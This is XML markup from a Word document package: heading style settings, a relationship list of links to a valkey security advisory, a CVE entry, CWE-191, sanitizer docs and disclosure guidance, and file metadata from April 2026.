      <w:bCs/>
      <w:color w:val="1A3A5C"/>
      <w:sz w:val="30"/>
      <w:szCs w:val="30"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 30"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="220" w:after="100"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="2E75B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hyperlink" Target="https://github.com/odaysec" TargetMode="External" Id="rIduaeybj5acooeigh9fwnt-" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/odaysec" TargetMode="External" Id="rIdfscfuecvcb0m33-n_uvtf" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-xhp4-6g9v-4xvj" TargetMode="External" Id="rIdmihmox-kdqxvujbhzljsn" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/c5e88165a35bc893d34cce05c10c3dfae923897b.png" Id="rId9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/45d2b3ecb64d48b4885b9c063358b4366f78f7a1.png" Id="rId10" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/19f55a26cf4ebac4a765570131fafb101b95afe9.png" Id="rId11" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/398f4bdb5041b24e8f5dc7b58da9dfc39c70014d.png" Id="rId12" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml" Id="rId27" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-xhp4-6g9v-4xvj" TargetMode="External" Id="R8dee57ad8887463f" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-49112" TargetMode="External" Id="R4a3daaa9d226452e" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/valkey-io/valkey" TargetMode="External" Id="R6be6360e5fda424e" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-xhp4-6g9v-4xvj" TargetMode="External" Id="Rfe1c80e07d304ccb" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ghidra-sre.org/" TargetMode="External" Id="Raeedcdf5b9a24466" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.iso.org/standard/74528.html" TargetMode="External" Id="R06f27073ee8e42f9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/191.html" TargetMode="External" Id="R8a92422601b04358" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://openssf.org/blog/2023/06/22/guide-to-coordinated-vulnerability-disclosure/" TargetMode="External" Id="Rb9212d8cda79436e" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://clang.llvm.org/docs/UndefinedBehaviorSanitizer.html" TargetMode="External" Id="Rd00442cb10f94947" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gcc.gnu.org/onlinedocs/gcc/Instrumentation-Options.html" TargetMode="External" Id="Rcdc79ce06afc44d6" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.open-std.org/jtc1/sc22/wg14/www/docs/n3096.pdf" TargetMode="External" Id="Rda90cae91d2e4c3f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 DRI</lastModifiedBy>
  <revision>2</revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-04-07T08:40:26.7520000Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-07T12:54:04.6394876Z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